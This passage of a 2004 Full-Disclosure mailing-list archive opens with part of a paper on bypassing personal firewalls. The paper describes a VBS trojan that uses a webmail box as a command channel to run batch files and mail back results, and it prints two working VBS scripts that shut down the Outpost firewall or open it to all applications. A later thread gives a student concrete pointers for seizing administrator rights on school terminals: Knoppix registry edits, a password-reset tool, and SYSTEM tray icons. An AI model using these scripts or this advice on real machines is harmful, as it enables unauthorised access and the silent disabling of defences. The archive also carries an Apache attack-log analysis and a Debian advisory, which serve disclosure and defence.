  Additionally, access of client application can be limited only to a
  list of trusted sites.

  Our approach is very simple. We call it CAT (Client Application
  Trojaning). We use trusted application itself without attempt to hack
  into it's code..
   http://www.security.nnov.ru/files/opossum/CAT.zip
  is simple PoC application. CAT uses COM to launch and control client
  application (Internet Explorer). This allows practically full access
  to the IE recourses, so we can ask IE to navigate to our site, and IE
  will use its proxy's and other settings. We don't need to include
  http-client code in our application - IE does all work for us.

  Another interesting thing - it's a work via trusted sites. In our
  example Trojan uses www.mail.ru server to communicate with bad guy,
  but it easy to use other trusted network services, for example
  Google's proxy
  (http://translate.google.com/translate?hl=en&u=www.phrack.org).
  Additionally almost any search system can be used as proxy with only
  limitation that each iteration may require few days.
  
  This CAT PoC works as next:

  - It creates IE COM object, navigates to www.mail.ru site.
  - CAT passes username and password to the site, and gets access to mailbox
  - CAT sends notification message "ready" to specified mailbox
  - Every 20 seconds CAT checks mailbox for messages with XXX.request
    subject (XXX - integer number).
  - If message appears in mailbox, CAT reads it, deletes message, and
    process it's data as a batch file.
  - Execution results are send to predefined account.

  remove IE.Visible = true
  line to run application in hidden mode.

  All this great functionality lies in 100 lines of VBS. You see, Basic
  can be more effective than assembler.
  <ARE NOT WE SCRIPTKIDDIES IN IMAGINARY BLACK HATS?>
  ILOVEYOU and another scripting viruses demonstrated application like
  this can be written by 14 y.o. schoolboys. VBS can be executed from
  Microsoft Office applications, Windows Explorer, Internet Explorer,
  etc.

  All personal firewalls tested, except Outpost 2.5 failed to detect
  information leak with this script. Outpost 2.5 requires minor
  modification for original script to start one additional IE instance
  before launching IE via COM, script modification is set as homework.

4. Bypassing personal firewall integrity protection
 ____________________________________________________________
 Axiom: Malware is undistinguishable from user

  This script unloads Outpost firewall (any version)

       set WShell = CreateObject("WScript.Shell")

       WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
       WScript.Sleep 200
       WShell.AppActivate "Agnitum", TRUE
       WScript.Sleep 100
       WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"
       WScript.Sleep 100
       WShell.SendKeys "{ENTER}"

  Another one creates a rule to permit Internet access for all
  applications

       set WShell = CreateObject("WScript.Shell")

       WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
       WScript.Sleep 100
       WShell.AppActivate "Agnitum", TRUE
       WScript.Sleep 10
       WShell.SendKeys "{F10}{LEFT}{LEFT}{LEFT}"
       WScript.Sleep 10
       WShell.SendKeys "{DOWN}{DOWN}{DOWN}{DOWN}{ENTER}"
       WScript.Sleep 10
       WShell.SendKeys "a{ENTER}"
       WScript.Sleep 10
       WShell.SendKeys "{F10}{LEFT}{DOWN}"
       WScript.Sleep 10
       WShell.SendKeys "n"

<APPLAUSE, BRAVOS />
<MEAN HATS OFF />

5. Final noise.
 ____________________________________________________________
 Axiom: There is no cure against unknown Malware. There are no Axioms in
 client application protection.

 The only way to somehow secure client application is implementing
 sandbox for any application to work with untrusted data. There are
 attempts to implement such sandbox without limiting it's functionality,
 for example GeSWall [4](by the way this project is looking for sponsor
 on investor). There are few commercial solutions of this kind, I do not
 believe any of this solution provides reliable security for Internet
 client application. Virtual machines for most architectures also have
 known flaws. Most reliable way to protect client application for now is
 creation of additional DMZ for application servers and providing
 terminal access to untrusted applications inside DMZ. Configuration
 example can be found in [5]. Of cause, this approach is not 100%
 reliable too.

 That's all.

<LONG APPLAUSE, OBJECTIONS FROM HALL (LEFT UNANSWERED), A COUPLE OF
WELL ANSWERED ROTTEN EGGS />

6. Links:

[1] 3APA3A, Bypassing content filtering software
http://www.security.nnov.ru/advisories/content.asp
[2] Firewall leak tester
http://www.firewallleaktester.com/
[3] rattle, Using Process Infection to Bypass Windows Software Firewalls
http://www.phrack.org/show.php?p=62&a=13
[4] GeSWall (General Systems Wall)
http://www.securesize.com/
[5] offtopic, 3APA3A, "In front of front-end security"
http://www.linuxchile.cl/docs.php?op=ver&id=65

<WARNING: SARCASM tag was not open within document \>
<WARNING: SARCASM tag was not closed within document \>

--
/3APA3A

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Valentin Höbel (hoebelgmail.com)
Date: Thu Oct 28 2004 - 08:08:21 CDT

> Hi folks,
>
> I'm at a boarding school in germany and we have a kind of internet
> terminal there with win2003 running on the computers. My question is:
> Is there a way of getting administrative privileges ? I used a RPC
> Exploit before but now the computers are patched. How do I get a
> administrator account now?? I have physikal access to the
> computers.....
>
> Greetings
>
> valentin - germany
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Harry de Grote (rik.bobbaerscc.kuleuven.ac.be)
Date: Thu Oct 28 2004 - 08:41:05 CDT

Op Thursday 28 October 2004 15:08, Valentin Höbel sgreifde:
> > Hi folks,
> >
> > I'm at a boarding school in germany and we have a kind of internet
> > terminal there with win2003 running on the computers. My question is:
> > Is there a way of getting administrative privileges ? I used a RPC
> > Exploit before but now the computers are patched. How do I get a
> > administrator account now?? I have physikal access to the
> > computers.....

use knoppix to boot from, mount the ntfs filesystem, and search the net for
which keys in registry you have to change. there may be other files too that
you have to change

there even are special bootcd's that are made only for the purpose of changing
the admin pass etc...

--
harry
aka Rik Bobbaers

K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50
Rik.Bobbaerscc.kuleuven.ac.be -=- http://harry.ulyssis.org

"\x41\x20\x63\x6f\x6d\x70\x75\x74\x65\x72\x20\x77\x69\x74\x68\x6f\x75\x74\x20"
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x69\x73\x20\x6c\x69\x6b\x65\x20\x61\x20\x66"
"\x69\x73\x68\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x61\x20\x62\x69\x63\x79\x63"
"\x6c\x65\x0a\x00"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Random Letters (randomisedlettershotmail.com)
Date: Thu Oct 28 2004 - 09:17:09 CDT

Why do you want to get administrative privileges? It can't be for a good
purpose. You just want to make more work for the people who probably work
very hard supporting you. You're a parasite.

Grow up, get a life. If you want to be Administrator then buy your own PC.

This list is for people who try to prevent break-ins - I'll bet that no-one
here will help you.

>I'm at a boarding school in germany and we have a kind of internet
>terminal there with win2003 running on the computers. My question is:
>Is there a way of getting administrative privileges ? I used a RPC
>Exploit before but now the computers are patched. How do I get a
>administrator account now?? I have physikal access to the
>computers.....
>
>Greetings
>
>valentin - germany

_________________________________________________________________
It's fast, it's easy and it's free. Get MSN Messenger today!
http://www.msn.co.uk/messenger

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Hackers of [xpire.info] use an unknown Apache 1.3.27 exploit???

From: Elia Florio (eflorioedmaster.it)
Date: Thu Oct 28 2004 - 09:44:08 CDT

Hi list,
I'm fighting again against an hackers crew
(I suppose the same mentioned in this link:
http://seclists.org/lists/incidents/2004/Jul/0056.html )
which is installing various malware on many
compromised box to get group of zombies ready-to-run.
(follow my previous mail on "xpire.info" and "splitinfinity.info")

I've found in some logs that they use different exploits on port 80
but one exploit is specific for Apache 1.3.27 (with PHP/Perl
and other module installed).

It looks like an overflow, I know that 1.3.27 is a bugged version,
but I would to know if anyone have seen this code before:
Extracted from error log of Apache :

216.40.203.9 - - [28/Oct/2004:10:54:37 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_xd8(xcbtxa6xba"
400 299

140.105.55.159 - - [08/Oct/2004:15:55:35 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_x8ci7x9fx8cxec" 400
-

195.140.140.122 - - [11/Oct/2004:03:58:05 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_xc3x8cx8czxcfx19"
400 -

212.78.145.16 - - [13/Oct/2004:20:48:23 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_xd4Nx91x10x04M" 400
-

65.125.235.250 - - [28/Oct/2004:09:55:02 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_A}xebxfax8axe5"
400 - "-" "-"

65.125.235.250 - - [28/Oct/2004:09:55:58 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_A}xebxfax8axe8"
400 - "-" "-"

I would suggest to any sysadmin using Apache 1.3.27 to ban this subnet
from their hosts, cause all attacks are coming from these machines :

216.40.203.*,
140.105.55.*,
195.140.140.*,
212.78.145.*,
65.125.235.*
(...and obvious "xpire.info")

Someone suggests to me that they are related to :

Qwest Communications NET-QWEST-BLKS-4 (NET-65-112-0-0-1)
65.112.0.0 - 65.127.255.255
EZZI.NET Q0625-65-125-224-0 (NET-65-125-224-0-1)
65.125.224.0 - 65.125.239.255

The exploits left this signatures (i have to translate the opcodes into asm)
:

xC6 xC2 x2C x37 x60 xC1 xEF xD4 xC4 x92 x22 x64 xC6 x6A xE1 x0D x8A
x6A x5F xD4 x4E x91 x10 x04 4D

The last bytes are changing in every attempt, so this seems to be a
bruteforce attempt to get a valid return address to execute the exploit.

Probably the exploit works for a specific version of Apache/Linux Kernel,
so the hacker have to try many times with different ret. address to
find the right way to execute it.

Any comments?

EF

________________________________________________
Messaggio inviato da
Edizioni Master Webmail
http://mbox.edmaster.it

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Andrew Poodle (andrewpIRW.co.uk)
Date: Thu Oct 28 2004 - 09:39:48 CDT

 
> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On
> Behalf Of Random Letters
> Sent: 28 October 2004 15:17
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] Re: getting administrator rights on win2003
machine?
>
> <snip>
>
> This list is for people who try to prevent break-ins - I'll bet that
no-one here will help you.

While I was going to agree with you.. Someone has already provided help
onlist...

Shame really..

I almost laughed at the request.. But was a little surprised to see
help offered almost immediately

a

>I'm at a boarding school in germany and we have a kind of internet
>terminal there with win2003 running on the computers. My question is:
>Is there a way of getting administrative privileges ? I used a RPC
>Exploit before but now the computers are patched. How do I get a
>administrator account now?? I have physikal access to the
>computers.....
>
>Greetings
>
>valentin - germany

_________________________________________________________________
It's fast, it's easy and it's free. Get MSN Messenger today!
http://www.msn.co.uk/messenger

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

This document should only be read by those persons to whom it is addressed and is not intended to be relied upon by any person without subsequent written confirmation of its contents.
Accordingly IRW Solutions Group Ltd disclaim all responsibility and accept no liability (including in negligence) for the consequences for any person acting, or refraining from acting, on such information prior to the receipt by those persons of subsequent written confirmation.

If you have received this e-mail message in error, please notify us immediately.
Please also destroy and delete the message from your computer.

Any form of reproduction, dissemination, copying, disclosure, modification, distribution and/or publication of this e-mail message is strictly prohibited.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Michel van der Klei (michelmitch-it.com)
Date: Thu Oct 28 2004 - 09:49:19 CDT

On Thu, Oct 28, 2004 at 03:41:05PM +0200, Harry de Grote wrote:
> Op Thursday 28 October 2004 15:08, Valentin H?bel sgreifde:
> > > Hi folks,
> > >
> > > I'm at a boarding school in germany and we have a kind of internet
> > > terminal there with win2003 running on the computers. My question is:
> > > Is there a way of getting administrative privileges ? I used a RPC
> > > Exploit before but now the computers are patched. How do I get a
> > > administrator account now?? I have physikal access to the
> > > computers.....
>
> there even are special bootcd's that are made only for the purpose of changing
> the admin pass etc...

Download the "Trinity Rescue Kit" and use the winpass utillity to reset the password.

Regards,

Michel

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Honza Vlach (janusvolny.cz)
Date: Thu Oct 28 2004 - 09:49:44 CDT

> use knoppix to boot from, mount the ntfs filesystem, and search the net for
> which keys in registry you have to change. there may be other files too that
> you have to change
>
> there even are special bootcd's that are made only for the purpose of changing
> the admin pass etc...

I thought that real blackhats don't teach lamers who can't even do their
homework properly =^)
 
Honza

--
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GIT/CS d- s: a-- C++++$ ULS++++$ P L+++ E--- W- N+ o? K? w-->--- O? M->+ V? PS PE Y++ PGP+++ !t 5? X++ R tv-- b++ DI+ D++ G+>+++ e h--- r++ y?
------END GEEK CODE BLOCK------
() ascii ribbon campaign - against html mail
/\ - against microsoft attachments

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFBgQcISVzvioqX7FkRAs6rAJ9yKP+5vVZdgu7F4ekm95q6cEOqXACffPFm
JuHUpHYRpZt5XFA3j8EQu9E=
=rQWB
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: KF_lists (kf_listssecnetops.com)
Date: Thu Oct 28 2004 - 10:50:32 CDT

Look for wonderful tray icons running as System... (anti-virus software
- *hint*hint*)
-KF

Valentin Höbel wrote:
>>Hi folks,
>>
>>I'm at a boarding school in germany and we have a kind of internet
>>terminal there with win2003 running on the computers. My question is:
>>Is there a way of getting administrative privileges ? I used a RPC
>>Exploit before but now the computers are patched. How do I get a
>>administrator account now?? I have physikal access to the
>>computers.....
>>
>>Greetings
>>
>>valentin - germany
>>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Harry de Grote (rik.bobbaerscc.kuleuven.ac.be)
Date: Thu Oct 28 2004 - 10:54:02 CDT

Op Thursday 28 October 2004 16:39, Andrew Poodle sgreifde:

> Shame really..
>
> I almost laughed at the request.. But was a little surprised to see
> help offered almost immediately

if you were talking about my reply... i just said it was possible.
we all know that if you have local access you can be root/administrator. it's
as simple as that.

i told him is was possible, but does he know now how it´s done??? i don't
think so...

i want to see the first person who actually knows now what to do. i will
certainly not give him the entire answer...

--
harry
aka Rik Bobbaers

K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50
Rik.Bobbaerscc.kuleuven.ac.be -=- http://harry.ulyssis.org

"\x41\x20\x63\x6f\x6d\x70\x75\x74\x65\x72\x20\x77\x69\x74\x68\x6f\x75\x74\x20"
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x69\x73\x20\x6c\x69\x6b\x65\x20\x61\x20\x66"
"\x69\x73\x68\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x61\x20\x62\x69\x63\x79\x63"
"\x6c\x65\x0a\x00"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Robert Allinson (epicroothack.org)
Date: Thu Oct 28 2004 - 10:00:25 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Random Letters wrote:

| Why do you want to get administrative privileges? It can't be for a
| good purpose. You just want to make more work for the people who
| probably work very hard supporting you. You're a parasite.
|
| Grow up, get a life. If you want to be Administrator then buy your
| own PC.
|
| This list is for people who try to prevent break-ins - I'll bet
| that no-one here will help you.
|
|> I'm at a boarding school in germany and we have a kind of
|> internet terminal there with win2003 running on the computers. My
|> question is: Is there a way of getting administrative privileges
|> ? I used a RPC Exploit before but now the computers are patched.
|> How do I get a administrator account now?? I have physikal access
|> to the computers.....
|>
|> Greetings
|>
|> valentin - germany
|
|
| _________________________________________________________________
| It's fast, it's easy and it's free. Get MSN Messenger today!
| http://www.msn.co.uk/messenger
|
| _______________________________________________ Full-Disclosure -
| We believe in it. Charter:
| http://lists.netsys.com/full-disclosure-charter.html
|
Actually, Isn't this a FULL-DISCLOSURE list? I would imagine that
security experts and "hackers" alike use this list.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBgQmJ1zENm+dj2mQRAs5uAJwJKiMuU+w+9XtNJmqADBbSoFdnGwCfXDAy
ZUfPswhqcVHWDxqp7zAGxaA=
=4dVd
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Todd Towles (toddtowlesbrookshires.com)
Date: Thu Oct 28 2004 - 11:08:15 CDT

Request like that will get you kicked out of other groups. Yet the
request was fill quickly, even without the requester pretending to be a
"Security Professional"

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
> Andrew Poodle
> Sent: Thursday, October 28, 2004 9:40 AM
> To: full-disclosurelists.netsys.com
> Subject: RE: [Full-Disclosure] Re: getting administrator
> rights on win2003 machine?
>
>
> > -----Original Message-----
> > From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On
> > Behalf Of Random Letters
> > Sent: 28 October 2004 15:17
> > To: full-disclosurelists.netsys.com
> > Subject: [Full-Disclosure] Re: getting administrator rights
> on win2003
> machine?
> >
> > <snip>
> >
> > This list is for people who try to prevent break-ins - I'll bet that
> no-one here will help you.
>
> While I was going to agree with you.. Someone has already
> provided help onlist...
>
> Shame really..
>
> I almost laughed at the request.. But was a little surprised to see
> help offered almost immediately
>
> a
>
> >I'm at a boarding school in germany and we have a kind of internet
> >terminal there with win2003 running on the computers. My question is:
> >Is there a way of getting administrative privileges ? I used a RPC
> >Exploit before but now the computers are patched. How do I get a
> >administrator account now?? I have physikal access to the
> >computers.....
> >
> >Greetings
> >
> >valentin - germany
>
> _________________________________________________________________
> It's fast, it's easy and it's free. Get MSN Messenger today!
> http://www.msn.co.uk/messenger
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>
> This document should only be read by those persons to whom it
> is addressed and is not intended to be relied upon by any
> person without subsequent written confirmation of its contents.
> Accordingly IRW Solutions Group Ltd disclaim all
> responsibility and accept no liability (including in
> negligence) for the consequences for any person acting, or
> refraining from acting, on such information prior to the
> receipt by those persons of subsequent written confirmation.
>
> If you have received this e-mail message in error, please
> notify us immediately.
> Please also destroy and delete the message from your computer.
>
> Any form of reproduction, dissemination, copying, disclosure,
> modification, distribution and/or publication of this e-mail
> message is strictly prohibited.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] PuTTY IPv6 0.56 also updated

From: Jeroen Massar (jeroenunfix.org)
Date: Thu Oct 28 2004 - 10:59:27 CDT

In response to the announcement of PuTTY 0.56, I have updated the
PuTTY IPv6 tree to be up-to-date with the 0.56 version.
Precompiled versions can be found, as usual, including the patch at:

http://unfix.org/projects/ipv6/

I've also signed the MD5SUMS included in the archive with my PGP key,
just like this message is signed, thus you can at least verify that the
files are coming from me.

There are also 4 unsigned int mismatch warnings fixed by making a couple
of variables unsigned. From this patch on, defining the /DIPV6 flag when
building will prefix "IPv6" before the "Release" or other fields in the
version file.

Greets,
 Jeroen

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Jeroen Massar / http://unfix.org/~jeroen/

iD8DBQBBgRdfKaooUjM+fCMRAleCAJ9ZYPvtd+47A2xrf8JXkiFXDOX5IgCgnHG8
zIDe4ivXeeUoPmkdYjiK9Kc=
=bs3R
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

Valdis.Kletnieksvt.edu
Date: Thu Oct 28 2004 - 12:22:41 CDT

On Thu, 28 Oct 2004 16:49:44 +0200, Honza Vlach said:
>
> --9Ek0hoCL9XbhcSqy
> Content-Type: text/plain; charset=iso-8859-2
> Content-Disposition: inline
> Content-Transfer-Encoding: quoted-printable
>
> > use knoppix to boot from, mount the ntfs filesystem, and search the net for
> > which keys in registry you have to change. there may be other files too that
> > you have to change
> > there even are special bootcd's that are made only for the purpose of changing
> > the admin pass etc...
>
> I thought that real blackhats don't teach lamers who can't even do their
> homework properly =^)

The part that nobody's going to tell him:

1) It's *easy* to whomp a server with a Knoppix boot if you have physical access.

2) It's *HARD* to do so without anybody noticing that the server is down and
you're sitting there in front of it, typing away as fast as you can. And even
the most midget-brained user can figure out that if the server is down, and
you're still typing, and you're *not* the sysadmin, you probably have something
to do with why it's down...

:)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFBgSrhcC3lWbTT17ARAg2DAKDXt+KMmk0f2pl4Ts0YjYaatHiJFACfT+4Z
8Gj158HbZ3Lk12+9htW6bLE=
=l00i
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Mike Nice (nicemanatt.net)
Date: Thu Oct 28 2004 - 12:45:34 CDT

A bit more on topic:
   If your administrator has used syskey level 2 or 3, the suggested
approaches won't work. In addition, if your administrator used the
Encrypting File System, any encrypted files will also be out of your reach;
other than to be able to see filenames, dates, encrypted contents, etc.

----- Original Message -----
> |> I'm at a boarding school in germany and we have a kind of
> |> internet terminal there with win2003 running on the computers. My
> |> question is: Is there a way of getting administrative privileges
> |> ? I used a RPC Exploit before but now the computers are patched.
> |> How do I get a administrator account now?? I have physikal access
> |> to the computers.....

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [SECURITY] [DSA 575-1] New catdoc packages fix temporary file vulnerability

debian-security-announcelists.debian.org
Date: Thu Oct 28 2004 - 08:58:47 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 575-1 securitydebian.org
http://www.debian.org/security/ Martin Schulze
October 28th, 2004 http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package : catdoc
Vulnerability : insecure temporary file
Problem-Type : local
Debian-specific: no
CVE ID : CAN-2003-0193
Debian Bug : 183525

A temporary file problem has been discovered in xlsview from the
catdoc suite, convertors from Word to TeX and plain text, which could
lead to local users being able to overwrite arbitrary files via a
symlink attack on predictable temporary file names.

For the stable distribution (woody) this problem has been fixed in
version 0.91.5-1.woody3.

For the unstable distribution (sid) this problem has been fixed in
version 0.91.5-2.

We recommend that you upgrade your catdoc package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3.dsc
      Size/MD5 checksum: 571 5fbd54b800449adcf10d9498fec33c4c
    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3.diff.gz
      Size/MD5 checksum: 14289 652e8c7c13aeb743db5b22ad19b86358
    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5.orig.tar.gz
      Size/MD5 checksum: 123460 9d9b32b4d579ea143989533e91bc196c

  Alpha architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_alpha.deb
      Size/MD5 checksum: 78750 a95948f97107f79d1ae917128c489729

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_i386.deb
      Size/MD5 checksum: 66898 94f0f2f0bccb8abbed2f70fd70d8d9f1

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_ia64.deb
      Size/MD5 checksum: 83648 7ad9075148ffeda180c904ee680f75e5

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_hppa.deb
      Size/MD5 checksum: 71094 ca3b29e69806dbaf8e452c44fa240785

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_m68k.deb
      Size/MD5 checksum: 65900 59af477395669716660602080a337d76

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_mips.deb
      Size/MD5 checksum: 73720 116e8e1521724514c9d93226f616ad56

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_mipsel.deb
      Size/MD5 checksum: 73726 6d8e050ad06cee6970fa4771da484b45

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_powerpc.deb
      Size/MD5 checksum: 68090 d9d5e32d398c76497fbc3408b163ed18

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_s390.deb
      Size/MD5 checksum: 67120 0834a0f473eaf106576e7b7034e3fe5c

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/c/catdoc/catdoc_0.91.5-1.woody3_sparc.deb
      Size/MD5 checksum: 70882 3977e5706886c40c320062b3a4800b7e

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announcelists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBgPsXW5ql+IAeqTIRAnXjAJ9tXLhsgxuNoGEnWcncVNO0g4dbJwCeOTVy
j/uBuBMJ8rinn6Sfj/5gNgM=
=SeNd
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

Valdis.Kletnieksvt.edu
Date: Thu Oct 28 2004 - 15:40:20 CDT

On Thu, 28 Oct 2004 16:29:36 EDT, Kenneth Ng said:
> It gets a bit harder when you have a lot of KVM switches in a big data
> center. It gets even harder when the KVM's are IP accessible
> throughout the firm because the twits who put it in didn't believe in
> IP access lists.

Somehow, I get the feeling that the original poster's site will discover
KVM switches around 2008 or so. ;)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFBgVkzcC3lWbTT17ARAgHqAKDjmDJaTEE3VJvjDYQ0say3UHVMFgCbB56W
RMSO1yAQAiDD2Q4Qmk1wT+U=
=nfXi
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: Kenneth Ng (kenneth.d.nggmail.com)
Date: Thu Oct 28 2004 - 15:29:36 CDT

It gets a bit harder when you have a lot of KVM switches in a big data
center. It gets even harder when the KVM's are IP accessible
throughout the firm because the twits who put it in didn't believe in
IP access lists.

On Thu, 28 Oct 2004 13:22:41 -0400, valdis.kletnieksvt.edu
<valdis.kletnieksvt.edu> wrote:
> On Thu, 28 Oct 2004 16:49:44 +0200, Honza Vlach said:
> >
> > --9Ek0hoCL9XbhcSqy
> > Content-Type: text/plain; charset=iso-8859-2
> > Content-Disposition: inline
> > Content-Transfer-Encoding: quoted-printable
> >
> > > use knoppix to boot from, mount the ntfs filesystem, and search the net for
> > > which keys in registry you have to change. there may be other files too that
> > > you have to change
> > > there even are special bootcd's that are made only for the purpose of changing
> > > the admin pass etc...
> >
> > I thought that real blackhats don't teach lamers who can't even do their
> > homework properly =^)
>
> The part that nobody's going to tell him:
>
> 1) It's *easy* to whomp a server with a Knoppix boot if you have physical access.
>
> 2) It's *HARD* to do so without anybody noticing that the server is down and
> you're sitting there in front of it, typing away as fast as you can. And even
> the most midget-brained user can figure out that if the server is down, and
> you're still typing, and you're *not* the sysadmin, you probably have something
> to do with why it's down...
>
> :)
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

From: darren windham (elcamino74ssgmail.com)
Date: Thu Oct 28 2004 - 16:37:28 CDT

If you can't find the tool on your own that can reset the local admin
account you need help. I carry it in floppy and cd form with me
incase I ever have a server I'm working on that no one knows the
passwords to.

Learn to use search engines before you start making yourself look silly.

On Thu, 28 Oct 2004 16:29:36 -0400, Kenneth Ng <kenneth.d.nggmail.com> wrote:
> It gets a bit harder when you have a lot of KVM switches in a big data
> center. It gets even harder when the KVM's are IP accessible
